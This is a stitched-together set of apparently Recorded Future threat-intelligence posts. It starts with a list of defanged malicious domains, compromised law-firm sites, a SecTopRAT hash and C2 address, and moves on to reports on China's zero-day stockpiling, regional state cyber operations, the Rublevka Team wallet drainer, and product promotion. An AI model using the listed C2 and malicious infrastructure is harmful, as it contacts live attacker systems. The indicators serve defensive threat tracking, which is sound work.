socialsignals[.]shop
socksforrocks[.]shop
streaming-films[.]xyz
syavsp5[.]top
tdsc[.]top
techradar[.]top
tiffanyearringforwomen[.]top
todoarmarios[.]top
todocalefactores[.]top
todocarritos[.]top
travelplace[.]top
trendings[.]top
universaltechnology[.]top
uochut[.]shop
via345[.]top
villahome[.]top
viloriterso[.]icu
viptravelcentres[.]com
vog168[.]top
wandan[.]top
wap9[.]top
warpdrive[.]top
watchesbest[.]top
wavob[.]top
wdwnp[.]top
xelesex[.]top
ydh7[.]shop
yntz6[.]shop
yourcialsupply[.]top
youtubevideo[.]top
yxta[.]top
yybvf[.]top
zaheirx[.]shop
zakachka[.]top
zerolendnow[.]top
zt45gg[.]top

Compromised Law Firm Websites:
bianchilawgroup[.]com
brattonlawgroup[.]com
brighterdaylaw[.]com
defensegroup[.]com
dwicriminallawcenter[.]com
fisherstonelaw[.]com
jarrettfirm[.]com
raineyandrainey[.]com
rbbfirm[.]com
rmvlawyer[.]com
www[.]brentadams[.]com
www[.]cfblaw[.]com
www[.]gerlinglaw[.]com
www[.]immigration-defense[.]com
www[.]schwartzandschwartz[.]com

Sectop RAT Hash:
59e7e7698d77531bfbfea4739d29c14e188b5d3109f63881b9bcc87c72e9de78

SecTopRAT C2 IP Address:
85[.]158[.]110[.]179[:]15847

Other Hashes:
5f1bd92ad6edea67762c7101cb810dc28fd861f7b8c62e6459226b7ea54e1428

Email Address Linked to GrayCharlie:
oreshnik[@]mailum[.]com

Executive Summary

• China’s observed use of zero-days has declined since 2023. However, it has expanded its capacity to discover and manage vulnerabilities, signaling a continued effort toward stockpiling exploits for strategic or military advantage.
• The Data Security Law (DSL) and Provisions on the Management of Network Product Security Vulnerabilities (RMSV) give the Chinese state first access and control over zero-days. Combined with government-backed competitions, incentives, and private contractors, this framework likely sustains one of the world’s largest reserves of exploitable vulnerabilities.
• The creation of the Information Support Force (ISF) and Cyberspace Force (CSF) signals China’s consolidation of cyber capabilities, likely enabling more effective offensive and defensive cyber operations, with vulnerabilities likely serving as a central resource.
• Defenders should adopt an “assume breach” posture and build for containment, implementing zero trust and layered defenses to limit attacker movement and impact after an exploit.

Figure 1: How China stockpiles vulnerabilities (Source: Recorded Future)

Analysis

Zero-Days as Strategic Weapons

A zero-day is a previously unknown software flaw for which no patch exists at the time it is discovered or exploited. Once weaponized, it allows adversaries to gain access, escalate privileges, or execute remote commands. These capabilities are especially effective against perimeter and enterprise systems, where a successful compromise can provide initial access and allow attackers to maintain persistence and carry out further cyber actions.

Choosing whether to disclose or keep a zero-day vulnerability is a strategic decision. Governments must balance public safety with the potential intelligence or military value of keeping the flaw secret. In the US, this process is guided by the Vulnerabilities Equities Process (VEP), which is designed to be transparent and generally favors disclosure to help maintain internet security.

China’s Vulnerability Management Regime

China’s vulnerability management system is centralized and led by the state. Its laws, incentives, and institutions work together to feed new exploits and technical capabilities directly to the government, turning software vulnerabilities into strategic assets under state control.

• Mandatory Reporting

The RMSV (2021) requires that all discovered vulnerabilities be reported to the Ministry of Industry and Information Technology (MIIT) within two days and prohibits disclosure to foreign entities. The Data Security Law (DSL) and National Intelligence Law (NIL) further compel all individuals and organizations to support state security objectives, with strict penalties for non-compliance. Together, these laws grant Beijing first access and complete control over all newly discovered flaws.

• Incentivizing Compliance

This legal framework is reinforced through financial and professional incentives. The China National Vulnerability Database of Information Security (CNNVD), managed by the Ministry of State Security (MSS), offers researchers and firms monetary rewards, certificates, honorary titles, and preferential access to government contracts. This system encourages compliance by making vulnerability disclosure both mandatory and materially rewarding.

• Talent Development and Recruitment Pipelines

China combines strict regulations with a well-organized system for developing cybersecurity talent. Competitions such as the Tianfu Cup, Matrix Cup, and QiangWang Cup serve as key recruitment and training platforms for the state’s cyber programs. The 2024 Matrix Cup’s $2.75 million USD prize pool, nearly twice that of Canada’s Pwn2Own, highlights the size of this investment.

• Private Sector Relationships
  
  China’s private sector also plays a pivotal role. Major firms such as Qi An Xin, Huawei, Qihoo 360, and NSFocus contribute vulnerabilities and technical expertise directly to the government. Large technology companies also fund or subcontract offensive work to smaller firms, creating a dense ecosystem of start-ups engaged in exploit research and hacking services. The i-SOON leaks (2023) revealed the scale and interconnectedness of this ecosystem: The company sold hack-for-hire services and targeting platforms to government customers while subcontracting work for Qi An Xin and Chengdu 404.

From Discovery to Deployment: Operationalizing China’s Vulnerability Pipeline

This centralized vulnerability ecosystem is producing measurable results, enabling Chinese state-sponsored groups to convert vulnerability discovery into operational access at a speed and scale far beyond that seen in other national programs. A clear manifestation of this is their sustained focus on enterprise and edge technologies, including Fortinet, VMware/ESXi, and Ivanti, where access is durable and often high-privileged, and detection is limited. In 2025, China-linked groups exploited Ivanti VPN and Trimble Cityworks (1, 2) flaws as part of a long-term strategy to remain undetected within networks, expand access, and position themselves for potential critical infrastructure disruption.

China continues to expand its network of CNNVD technical support units (TSUs) and related programs, increasing its overall research base. TSUs are specialized organizations, often universities, state-linked labs, and cybersecurity firms that directly feed vulnerability research and intelligence into the national system. Since 2021, the number of TSUs has increased significantly, broadening the state’s research capacity and deepening its ability to identify and operationalize software flaws at scale.

Figure 2: Number of new CNNVD TSUs by month, June 2021 to July 2025 (Source: Natto Thoughts)

Most vulnerability disclosures to affected vendors and the broader security community still originate from universities, labs, and cybersecurity firms associated with CNNVD, CNVD, and the expanding TSU network. However, even as the ecosystem grows, the overall volume of these disclosures continues to decline, indicating that a larger share of discoveries is now being routed internally rather than published. This suggests that more vulnerabilities are being withheld for state-directed use. Secrecy surrounding hacking competitions is also growing: The Tianfu Cup was not held publicly in 2024, and the 2024 Matrix Cup shared little to no details about discovered exploits. These competitions have historically been major sources of high-quality vulnerabilities, and reduced transparency further aligns with the shift away from open disclosure.

Together, these trends — the rapid expansion of TSUs, the decline in public vulnerability reporting, and the tightening secrecy around exploit-generation events — likely point to a deliberate state strategy that emphasizes centralized stockpiling and selective operational use of vulnerabilities rather than public disclosure.

Strategic Stockpiling and Selective Use

China’s reported use of zero-days declined from twelve in 2023 to five in 2024, and it is responsible for only ten of the 104 zero-day exploits identified globally so far in 2025. While this may partly reflect limited visibility into zero-day deployment and attribution, the trend may also suggest a more selective, strategic approach to when and how its zero-day capabilities are used.

Figure 3: Of the 104 zero-days identified in 2025, ten were attributed to Chinese state-sponsored threat actors (Source: Recorded Future)

Beijing’s control mechanisms under the RMSV and DSL enable it to selectively weaponize or withhold zero-days, preserving its most impactful capabilities for crises or strategic objectives. At the same time, n-day vulnerabilities — older but still unpatched flaws — remain highly effective due to inconsistent global patching.

Using these known flaws allows Chinese operators to gain access to networks and gather intelligence without revealing their zero-day exploits. Overall, this reflects a system designed for long-term preparedness rather than immediate gain.

Military Integration and Strategic Significance

China’s April 2024 military reforms introduced three new divisions within the People’s Liberation Army (PLA), including two centered on cyber and information security:

• The Information Support Force (ISF), which is responsible for the security and continuity of China’s military networks, data systems, and command infrastructure
• The Cyberspace Force (CSF), which is dedicated to both offensive and defensive cyber operations

Together, the two units consolidate China’s cyber and information capabilities, which were previously primarily nested under the PLA Strategic Support Force. These units form the backbone of its digital warfighting structure. The restructuring is likely to enhance Beijing’s ability to coordinate kinetic and cyber operations, with zero-days serving as key enablers and potential first-strike tools.

Figure 4: New structure of the People’s Liberation Army (PLA) (Source: The Jamestown Foundation)

The future use of zero-days will depend on how China decides to pursue its geostrategic goals, such as future unification with Taiwan. However, by compromising critical networks in advance, China can secure persistent access and deploy disruptive cyber effects alongside kinetic operations, as seen in Russia’s coordinated cyber-military campaigns in Ukraine. Chinese state-sponsored Volt Typhoon activity has been widely assessed as fulfilling such a purpose.

Outlook

• Increased Willingness to Use Zero-Days: As China reduces its reliance on US technology through its “Delete America” campaign, the cost of exploiting Western software will decrease, making zero-day use more attractive in future conflicts over the long term.
• Expanded Pre-Positioning: Expect continued infiltration of critical infrastructure and enterprise systems through both n-day and zero-day exploits to ensure durable wartime access.
• Increased N-day Use: The rapid adoption of AI-assisted coding and automation is accelerating the accumulation of software vulnerabilities. This expanding security debt — the accumulation of unpatched and unreviewed vulnerabilities — will give adversaries, including China, a broader and more persistent pool of n-day exploits to weaponize.
• Evolving Contractor Ecosystem: State-aligned private firms are likely to accelerate automation and AI-assisted vulnerability discovery, thereby expanding the Chinese state’s operational stockpile of viable exploits.

Mitigations

• Adopt an “Assume Breach” Posture: Implement zero-trust architectures that enforce identity and device verification at every access point. Use Recorded Future® Threat Intelligence to monitor for China-nexus infrastructure and malicious activity, feeding enriched indicators directly into security information and event management (SIEM) and security orchestration, automation, and response (SOAR) workflows.
• Prioritize Edge and Enterprise Patching: Focus remediation efforts on virtual private networks (VPNs), firewalls, hypervisors, and identity platforms most commonly targeted by China-nexus threat actors. Use Recorded Future Vulnerability Intelligence to track emerging zero-day and n-day threats, prioritize patching by exploitation risk, and validate remediation across critical systems.
• Detect Post-Exploitation Behavior: Use D3FEND mappings such as Process Access Pattern Analysis (D3-PAPA) and Remote Access Detection (D3-RAD) to identify stealthy follow-on actions. Combine these controls with Recorded Future Attack Surface Intelligence to identify exposed assets and verify that detection coverage extends to externally facing environments.
• Secure Identities and Access: Leverage Recorded Future Identity Intelligence to detect compromised credentials that may complement exploit-based intrusions.

Risk Scenario

EnerTech Global, a European energy technology firm providing control systems and smart grid software to multiple NATO-aligned countries, becomes the target of a Chinese state-sponsored cyber campaign. Using undisclosed zero-day vulnerabilities, Chinese operators infiltrate EnerTech’s production and customer environments to gather intelligence, manipulate software updates, and pre-position for potential disruption.

First-Order Implications

Chinese threat actors exploit a zero-day in a network management or VPN appliance to gain initial access to EnerTech’s internal systems and engineering networks.

A zero-day in industrial control or software build pipelines is used to insert malicious code into firmware updates distributed to downstream customers.

Organizational Risks:

• Operational: Compromise of development and production networks halts manufacturing and disrupts customer support operations.
• Legal: Breach of export-control and cybersecurity regulations triggers EU and US compliance investigations.
• Brand: Public confirmation of a “state-backed breach” undermines trust with government and defense customers dependent on EnerTech’s technology.

Second-Order Implications

Attackers use stolen code-signing certificates to distribute trojanized software updates to energy utilities across Europe. Collected intelligence on grid infrastructure is used to map potential disruption points for future contingency operations.

Organizational Risks:

• Operational: Some utilities begin to see irregularities in their operational technology (OT) environments, including unexpected behavior in grid-monitoring tools, delayed telemetry updates, and unexplained authentication failures on systems that rely on EnerTech software.
• Brand: EnerTech’s reputation deteriorates as customers and regulators question its software assurance and supply chain controls.
• Legal: Disclosure of tampered software triggers international incident response coordination and potential export-license suspension.

Third-Order Implications

Persistent access enables China to remotely sabotage or disable systems during a geopolitical crisis, thereby amplifying disruption across allied power grids. Stolen intellectual property is used by Chinese competitors to replicate EnerTech’s industrial software, undercutting global market bids.

Organizational Risks:

• Competitive: Loss of proprietary code and technology enables China-based competitors to dominate regional procurement markets.
• Brand: Association with a high-profile critical infrastructure breach erodes long-term credibility in both commercial and government sectors.
• Legal: Multinational investigations and sanctions create enduring compliance exposure and financial penalties.

Further Reading

• China-linked Group RedEcho Targets the Indian Power Sector Amid Heightened Border Tensions
• Continued Targeting of Indian Power Grid Assets by Chinese State-Sponsored Activity Group
• From Coercion to Invasion: The Theory and Execution of China’s Cyber Activity in Cross-Strait Relations
• China’s Ministry of State Security Likely Influences National Network Vulnerability Publications
• China’s new Information Support Force

Executive Summary

Regional conflicts and weakened international institutions are driving the use of offensive cyber operations beyond the “Big Four” (China, Russia, Iran, and North Korea). Monitoring these threat actors requires organizations to proactively assess their geopolitical risk to understand where future threats are most likely to emerge.

In 2025, Recorded Future identified at least twenty actors across thirteen “non-Big Four” countries conducting cyber operations, primarily linked to regional conflicts, domestic surveillance, or foreign espionage.

Companies should closely monitor regional geopolitics and maintain strong continuity and resilience plans to protect against cyber espionage or disruptive cyberattacks.

Figure 1: Trends influencing how and why state-sponsored actors beyond China, Russia, Iran, and North Korea carry out cyber operations (Source: Recorded Future)

Analysis

Overview of Other State Sponsors of Cyber Operations

While the “Big Four” account for the majority of reported cyber threat activity, many other countries use cyber operations to advance their strategic interests. Recorded Future data shows that most observed activity outside of the “Big Four” stems from regional conflicts. Patriotic hacktivist groups, which advance state interests alongside state-sponsored espionage operations, represent the highest volume of reported activity. The degree of coordination between hacktivists and the government remains unclear and likely varies. However, their actions are included in this assessment because of their close alignment with state objectives, which means their activity correlates with interstate conflict risk.

Outside of active conflict, espionage against foreign and domestic targets continues to be a major driver of cyber operations. The most cyber-capable states invest heavily in avoiding detection and attribution, given the significant negative political consequences of exposure.

Tracking threat actors beyond the Big Four requires organizations to understand their geopolitical risk in order to anticipate where threats are most likely to emerge. Operating in certain regions or conflict zones likely increases the risk of cyber espionage or destructive attacks.

Regional Cyber Conflicts

Territorial disputes drove nearly two-thirds of observed cyber activity in 2025, according to Recorded Future data. Cyber operations focused on intelligence collection against government, defense, and other critical infrastructure. Hacktivists escalated their activity during conflicts, carrying out nuisance-level attacks amplified through influence operations. Like hacktivists, influence operations align closely with state interests during conflict, but have varying degrees of connection to the state. These activities rarely affect battlefield outcomes but are designed to signal technical sophistication or moral superiority over the adversary.

India and Pakistan

Between May 7 and 10, 2025, India and Pakistan exchanged a series of missile strikes — the most serious escalation between the two nuclear-armed countries in decades. Throughout the crisis, large volunteer hacktivist communities on both sides conducted disruptive attacks, primarily DDoS and website defacements. Pakistan-linked APT36 conducted espionage operations targeting the Indian government and other politically motivated targets, while threat actors linked to the Indian government, such as SideWinder, pursued Pakistani military targets.

Figure 2: Cyber activity between India and Pakistan spiked alongside the outbreak of armed conflict in May 2025 (Source: Recorded Future)

Influence operations intended to shape perceptions of the conflict also intensified. Influence networks amplified hacktivist claims, often overstating their impact, such as widespread reporting on Pakistani social media that hackers had shut down 70% of India’s electric grid. These operations are intended to portray their own side as more capable and their adversary as vulnerable, underscoring the importance of narrative control in conjunction with military operations.

Thailand and Cambodia

Similar to cyber engagements observed between India and Pakistan, hacktivist operations bolstered by influence campaigns significantly escalated between Thai hackers and Cambodian hackers following the May 2025 conflict. These were largely carried out by self-proclaimed patriotic hacktivist groups. Operations included DDoS attacks, website defacements, and data leak operations. More targeted hack-and-leak operations were also intended to reveal politically damaging information about the other country’s leadership. Influence operation narratives emphasized that the opposing side was the aggressor in the conflict, likely in order to garner both domestic and international support.

Morocco and Algeria

While tensions between Morocco and Algeria have not escalated into armed conflict, cyber hostilities increased significantly in 2025. In the context of these tensions, pro-Algerian hacktivists have allegedly carried out a series of high-profile attacks on Moroccan institutions, striking the National Social Security Fund, the National Agency for Land Conservation, and the Ministry of Justice. The hackers, going by JabaROOT, leaked personal and financial data of millions of Moroccan citizens, potentially exacerbating existing domestic tensions over income disparity. The cyberattacks may have been intended to demonstrate Moroccan vulnerability while maintaining a level of deniability for the Algerian government. Moroccan hacktivists responded with retaliatory data breaches against the Algerian government and education institutions.

Espionage Operations Outside of Armed Conflict

While many more countries almost certainly engage in cyber espionage, the following threat actors have been tracked attempting to collect information on targets of political significance:

• While India-linked threat actors such as SideWinder and Bitter have traditionally targeted neighbors like Pakistan, Sri Lanka, and Bangladesh, espionage against European diplomatic entities increased significantly in 2024, demonstrating a broader targeting scope.
• Vietnam has accelerated its development of cyber capabilities. APT32, likely linked to the Vietnamese government, has carried out operations against Chinese cybersecurity researchers as well as against internal dissidents. In the past, this group has also targeted car manufacturers, foreign governments, and others, driven by geopolitical and economic priorities.
• At least two threat actor groups observed conducting espionage operations have been linked to Türkiye: Marbled Dust and StrongPity, who prioritize regional and domestic targets. In addition, a robust online community of patriotic hacktivists targets regional and international adversaries, whether historical (such as Armenia and Greece) or in modern disputes (France and Germany).
• Stealth Falcon, linked to the United Arab Emirates, has been observed exploiting a zero-day vulnerability to target a Turkish defense organization. The group has been active since at least 2016, targeting government and defense organizations primarily in the Middle East and Africa.

Political and diplomatic priorities make intelligence targets predictable. Organizations should assess not only their regional exposure but also whether their industry aligns with strategic priorities, as sectors tied to national strategy are the most likely targets for espionage.

Domestic Surveillance Activity

Many states use their cyber capabilities to monitor domestic security concerns, which can include law enforcement or national security priorities, monitoring political opposition, or conducting economic espionage on behalf of a key national industry. Domestic surveillance capabilities are often supplemented with commercial off-the-shelf spyware, such as Intellexa’s Predator or Candiru’s DevilsTongue. Similar to understanding political priorities for cross-border espionage, companies should assess whether they possess data that may be of political significance to the government of a country in which they operate. States that lack sufficient oversight or legal privacy protections pose an increased risk of intrusive cyber monitoring and surveillance.

Figure 3: (Left) Graphical representation from the Insikt Group report titled Dark Covenant of the direct and indirect links between Russian Intelligence Services and individuals in the Russian cybercriminal underground; (Right) Infographic of reported cyberattack by Russian state-backed ransomware operators against German military contractors

(Source: Recorded Future)

Outlook

• Cyberattacks are likely to increase as international alliances weaken: The Thailand-Cambodia and India-Pakistan conflicts demonstrate an increased willingness to use force to pursue regional goals. Deployments in multilateral peacekeeping operations decreased by 40% over the last decade, likely due to challenges in generating the necessary support for intervention. This makes it more likely that states will turn to violence to resolve disputes, as opposed to non-violent negotiations. Cyber and influence operations are becoming increasingly common features in these conflicts, serving as a low-cost means of signaling strength, shaping narratives, and imposing limited disruption.
• Cyber capability build-up may follow conventional military build-up: NATO countries in Europe, as well as South Korea and Japan, are increasing their military spending. While many of these countries already have advanced cyber capabilities, they may seek to invest in more sophisticated offensive capabilities to augment conventional forces. Legal and doctrinal changes, such as in Japan and South Korea, are also laying the groundwork for a shift from a defensive cyber policy to an offensive posture.
• Commercial cyber capabilities may be sought for interstate conflict: Countries seeking to gain a cyber advantage in advance of a regional conflict may turn to commercial offensive tools, similar to the growing reliance on these tools for internal law enforcement or counterterrorism operations. This reduces the barrier to entry for smaller or less technically mature states, enabling more actors to conduct sophisticated intrusions, targeted espionage, and high-impact disruption.

Mitigations

• Use Recorded Future’s Geopolitical Intelligence to monitor regional conflicts and geopolitical developments for risks to international and outsourced operations.
• Use Recorded Future’s Threat Intelligence to track threat actor groups and detect TTPs associated with non-Big Four countries.
• Understand the risk of surveillance for personnel traveling to high-risk countries and take mitigating actions such as using alternative devices. Use Recorded Future’s Country Risk Data in the Geopolitical Intelligence module to assess surveillance and other travel risks.
• Ensure continuity-of-operations plans are in place to mitigate the impacts of disruptive or destructive attacks. Use Recorded Future Analyst-on-Demand for bespoke research on how your organization might be targeted.

Figure 4: Starting with these four questions can help you understand threat actors’ motivations for targeting your organization (Source: Recorded Future)

Risk Scenario

A longstanding territorial dispute between Country A and Country B erupts into a military skirmish at the border, with risks of further escalation. Country A is home to a robust business process outsourcing industry serving some of the world’s largest international corporations.

First-Order Implications

Groups claiming to be patriotic hacktivists from both countries conduct hack-and-leak operations and website defacements. These are amplified by partisans on social media who often exaggerate the impact of these attacks.

• Competitive disadvantage: Hack-and-leak operations expose sensitive internal documents, including proprietary trade secrets and embarrassing communications.
• Increased surveillance risk: The conflict increases domestic surveillance activity in Country B to monitor for internal threats. International employees traveling to Country B are subject to enhanced surveillance.

Second-Order Implications

Actors claiming to be hacktivists supporting Country A escalate cyber operations, carrying out persistent cyberattacks against Country B’s electrical grid. As a result, Country B experiences rolling blackouts in the capital city.

• Operational disruption: The blackouts prevent call centers from performing essential business functions, resulting in significant service delays and revenue losses for corporations worldwide.
• Physical security risk: Anger over blackouts increases public support for escalating operations against Country A. The escalation of conflict increases the risk of harm to employees or the destruction of facilities.

Third-Order Implications

The United States and China become increasingly involved in the conflict between Country A and Country B, providing military, logistical, and cyber capabilities to their preferred country. The external support prolongs the conflict and increases the risk of involving neighboring countries.

• Conflict escalation: With more weapons and logistical support from great power backers, fighting between Country A and Country B expands from the border to strikes further in the interior. Both military and civilian casualties increase as violence escalates.
• Regional economic impact: Extended disruptions may cause international corporations to move operations to more stable regions, leading to a negative economic impact in the region.

Further Reading

• Influence Operations and Conflict Escalation in South Asia
• New APT32 Malware Campaign Targets Cambodian Government
• From Pegasus to Pall Mall: Managing Risks of Offensive Cyber Capabilities
• Current Trends in the Turkish Language Dark Web

The Problem with Pre-Packaged Intelligence

Security teams are drowning in threat intelligence feeds. Hundreds of vendors promise comprehensive coverage, real-time alerts, and actionable insights. Yet sophisticated adversaries continue to operate undetected, incidents take weeks to scope, and attribution remains elusive.

The fundamental issue isn't quality but control. Traditional network visibility solutions force passive consumption: their alerts, their priorities, their timeline. This one-size-fits-all approach assumes threats targeting financial services match those facing critical infrastructure, or that yesterday's patterns predict tomorrow's campaigns.

Network intelligence flips this model. With global visibility spanning billions of connections across 150+ sensors in 35+ countries, you can investigate what matters to your organization using your own selectors, questions, and mission requirements.

What Network Intelligence Actually Means

Effective network intelligence requires global visibility at scale: distributed sensors across dozens of countries processing billions of packets daily, generating tens of millions of network flow records. But collection methodology matters equally. Metadata-only approaches capture source and destination IPs, ports, protocols, flow counts, and timestamps without payloads or deep packet inspection. This enables operation at internet scale while better maintaining ethical boundaries and data minimization standards.

At Recorded Future, our network intelligence capabilities provide this access to such global network traffic observations for specific IP addresses of interest. Our Insikt Group uses this same infrastructure to research 500+ malware families and threat actors. Government CERTs use these capabilities to analyze adversary infrastructure at national scale.

What This Means in Practice

Consider what changes when your security operations can query global network intelligence.

Faster SOC Triage

Your team flags a suspicious IP at 2 AM. Instead of guessing whether it's noise or the start of something worse, query the network intelligence platform. See its global communication patterns instantly. Understand whether you're looking at commodity scanning or infrastructure that's been quietly staging against targets for weeks. Internet scanner detection capabilities automatically classify the behavior and reveal specific ports targeted, web requests made, and geographic distribution. Triage in minutes, not hours.

Targeted or Opportunistic? Now You'll Know

When threats hit your industry, the first question is always: are we specifically in the crosshairs, or is this spray-and-pray? Network intelligence lets you track adversary infrastructure across your sector before it reaches your perimeter. See the pattern. Understand the targeting. Brief leadership with confidence because you're no longer guessing. You're showing them the actual traffic patterns that prove whether your organization is in the crosshairs or caught in the spray.

Fraud Infrastructure Exposed

Fraud campaigns depend on infrastructure that moves fast but leaves traces. Your selectors, run against global network intelligence, can reveal the networks behind credential stuffing, account takeover, and payment fraud before the campaign fully scales.

Attribution That Actually Holds Up

Mapping adversary infrastructure is hard. Connecting it to broader campaigns and ultimate operators is harder. Network intelligence gives you the longitudinal visibility to trace how infrastructure evolves, clusters, and connects. Administrative traffic analysis reveals patterns operators use to manage C2 infrastructure. When you identify admin flows from a common source connecting to multiple C2 servers, you're mapping the operator's pattern based on observed behavior across hundreds of global vantage points. You're turning indicators into intelligence.

Integration Into Security Workflows

Network intelligence integrates directly into existing security workflows through API access to SIEMs, SOAR platforms, and custom analysis tools. When your SIEM flags suspicious traffic, automated queries reveal global context: Is this IP conducting C2 communications? Scanning your sector specifically? Connected to infrastructure from last month's campaign? Curated threat lists reduce noise from legitimate security research while enabling early blocking of targeted reconnaissance, turning your existing tools into instruments for active investigation rather than passive alerting.

When Expertise Becomes Essential

For organizations facing persistent, sophisticated adversaries, network intelligence capabilities alone aren't sufficient. The difference between having access to global network visibility and operationalizing it effectively comes down to tradecraft.

Recorded Future's Global Network Intelligence Advisory program addresses this by pairing technical capabilities with forward-deployed analysts and embedded engineers who work directly inside your SOC or intelligence fusion center. This becomes especially critical when nation-states are mapping your critical infrastructure, when advanced persistent threats are staging for long-term access, or when attribution could influence strategic decision-making. You need the ability to investigate specific questions with global visibility and the expertise to interpret what you find.

The Compliance Framework That Enables Trust

Network intelligence operates under strict ethical and legal guidelines. All use is subject to our Acceptable Use Policy and surveillance, profiling of individuals, or political targeting is prohibited. Access is invitation-only, requiring vetting and agreement to specific terms of use.

These aren't just policies but foundational to how this capability operates. The metadata-only collection model, the data minimization approach, and the geographic distribution that prevents any single point of visibility into user communications are design choices. These constraints aren't obstacles to effectiveness but enablers of trust. They allow powerful intelligence capabilities to exist while promoting appropriate boundaries.

Moving Forward

The gap between what most security programs need and what traditional threat intelligence provides continues to widen. Adversaries operate at scale, evolving infrastructure faster than feeds can update. Internal telemetry shows only what touches your perimeter. Point-in-time observations lack the context to distinguish targeted attacks from noise.

Network intelligence addresses this gap with the ability to query global visibility using your own selectors. At Recorded Future, we've developed capabilities that operate at this scale, with the compliance framework and operational expertise to make them effective. For organizations ready to move beyond pre-packaged feeds, we're offering these capabilities to select customers through an invitation-only program.

What matters now is recognizing that your questions matter more than their answers and building security programs that reflect that reality.

Uncertainty has become the operating environment for business. And this year, fragmentation is driving it.

The global threat landscape didn't simplify in 2025; it shattered. Geopolitical alliances strained. Criminal enterprises splintered under law enforcement pressure, then regrouped into smaller, faster, and harder-to-track operations. State-sponsored cyber actors shifted from dramatic disruptions to quiet pre-positioning, embedding themselves in networks and waiting. Hacktivist groups and influence networks amplified conflicts, blurring the line between genuine intrusions and perception warfare.

But here's what makes this moment dangerous: as long-established norms unwind, fragmentation is paradoxically enabling greater interoperability across domains that were once distinct. State objectives, criminal capability, and private-sector technology increasingly reinforce one another. That convergence creates uncertainty, compresses warning time, and expands plausible deniability.

Today, Recorded Future's Insikt Group releases the 2026 State of Security report, our most comprehensive annual analysis of the forces shaping global security.

Drawing on proprietary intelligence, network telemetry, and deep geopolitical analysis, this report examines how 2025's fractures are reshaping the threat environment — and what security leaders must prepare for in the year ahead.

The End of Stability as a Baseline Assumption

Figure 1: 2025 redefined international relations (Source: Recorded Future)

Executive Summary

Insikt Group has identified a major cybercriminal operation specializing in large-scale cryptocurrency theft, operating under the moniker “Rublevka Team”. Since its inception in 2023, the threat group has generated over $10 million through affiliate-driven wallet draining campaigns. Rublevka Team is an example of a “traffer team,” composed of a network of thousands of social engineering specialists tasked with directing victim traffic to malicious pages. Unlike traditional malware-based approaches such as those used by the traffer teams Marko Polo and CrazyEvil (previously identified by Insikt Group, both of which distributed infostealer malware), Rublevka Team deploys custom JavaScript scripts via spoofed landing pages that impersonate legitimate crypto services, tricking victims into connecting their wallets and authorizing fraudulent transactions. Their infrastructure is fully automated and scalable, offering affiliates access to Telegram bots, landing page generators, evasion features, and support for over 90 wallet types. By lowering the technical barrier to entry, Rublevka Team has built an extensive ecosystem of global affiliates capable of launching high-volume scams with minimal oversight.

This structure poses a growing threat to cryptocurrency platforms, fintech providers, and brands whose identities are being impersonated. Organizations that facilitate blockchain transactions, particularly fintech firms, exchanges, or wallet providers, face elevated reputational and legal risks if customers fall victim to these scams. Even if the victim’s compromise occurs outside a firm’s platform, failure to detect spoofed landing pages or fraudulent referrals can trigger consumer backlash, loss of trust, or regulatory scrutiny around customer protections and Know Your Customer (KYC) enforcement. The threat group’s agility — evidenced by its use of frequently rotating domains, targeting lower-cost chains like Solana (SOL), and exploiting Remote Procedure Call (RPC) APIs — undermines traditional fraud detection and domain takedown efforts. Their model mirrors ransomware-as-a-service (RaaS) operations, signaling a continuation of the broader shift toward scalable, service-based cybercrime that organizations must proactively monitor, disrupt, and defend against to protect customers and maintain trust.

Key Findings

• The objective of a Rublevka Team scam is to create an attractive SOL-based offer, such as a promotion or an airdrop event, generate traffic to the lure via social media or advertisements, and trick a user into connecting their wallet to the website and signing a transaction that drains their wallet.
• As of writing, Rublevka Team’s primary Telegram channel has approximately 7,000 members. Over 240,000 messages have been posted to Rublevka Team’s automated “profits” channel, indicating at least 240,000 successful wallet drains, with transactions ranging from $0.16 to over $20,000.
• Rublevka Team offers a custom JavaScript drainer embedded into their landing pages, which exfiltrates victims’ SOL assets by draining held tokens. The drainer is compatible with over 90 SOL wallet types.
• The threat group’s infrastructure is fully automated via Telegram bots, offering affiliates tools for landing page creation, campaign tracking, cloaking, and distributed denial-of-service (DDoS) protection.
• The drainer campaign, active since 2023, leverages spoofed versions of legitimate services such as Phantom, Bitget, and Jito to maximize user trust and conversion

Key Takeaways:

• Recorded Future deployed Autonomous Threat Operations within its own SOC before customer release, ensuring real-world effectiveness and identifying critical capabilities.
• Autonomous Threat Operations reduced analyst-dependent, inconsistent processes, creating standardized hunts that deliver the same input, output, and expectations every time.
• Team members now run 15-20 threat hunts weekly—work that previously required days or weeks of manual research, coordination, and planning.
• During the Salt Typhoon campaign, Recorded Future's CISO launched a comprehensive network-wide threat hunt in five minutes between meetings, enabling immediate risk mitigation.
• A single pane of glass eliminates context-switching across multiple tools, allowing analysts to hunt threats and research IOCs within one platform.

Autonomous Threat Operations in action: Real results from Recorded Future’s own SOC team

The ultimate test of any cybersecurity solution Recorded Future builds? Using it to defend our own network.

That's exactly what we did with Autonomous Threat Operations. Before rolling it out to customers, we became Customer Zero, deploying the technology within our security operations organization to see if it could truly transform the way security teams hunt for threats.

The results exceeded our expectations. What we discovered wasn't just incremental improvement; it was a fundamental shift in what our security team could accomplish.

The challenge: Inconsistent and analyst-dependent threat hunting

Prior to implementing Autonomous Threat Operations, we faced the same threat hunting challenges many security teams struggle with today. As Josh Gallion, Recorded Future's Incident Response Manager, explains: "Before using Autonomous Threat Operations, our approach to threat hunting was more piecemeal and unique to each analyst. It varied based on whatever they were comfortable with and however they were trained on the tooling."

This inconsistency meant that the quality and thoroughness of our threat hunts varied significantly by analyst. And since each team member had different strengths, different levels of experience, and different comfort levels with our security tools, we struggled to standardize the process.

The transformation: Unified, repeatable threat hunting

Autonomous Threat Operations leveled the playing field immediately. "It unifies the hunting capability and makes it so that every time analysts run a hunt, it's the same," says Gallion. "We get the same input, we get the same output, and we know what to expect."

The implementation was remarkably straightforward. "When we turned it on, it just was a simple connection to our Splunk environment," he says. "And once the team started using it, we could see an increase in the number of threat hunts each user would do."

Perhaps most importantly, Autonomous Threat Operations enabled our team to shift from reactive, manual hunting to proactive, automated operations. "Now we can schedule hunts that will continuously run over time, update with the threat actor TTPs, and give us a more holistic view," Gallion says. "Before, we had to have an analyst get back into the product and look for new IOCs to run. Now it just runs it automatically and we know that that's taken care of."

Real-world impact: Upskilling junior analysts and enabling rapid response

According to Recorded Future's CISO, Jason Steer, the true value of Autonomous Threat Operations became clear through two significant outcomes.

First, the technology dramatically upskilled our junior staff. In traditional manual workflows, preparing to run a single threat hunt could take days or even weeks—requiring extensive research, coordination, and planning.

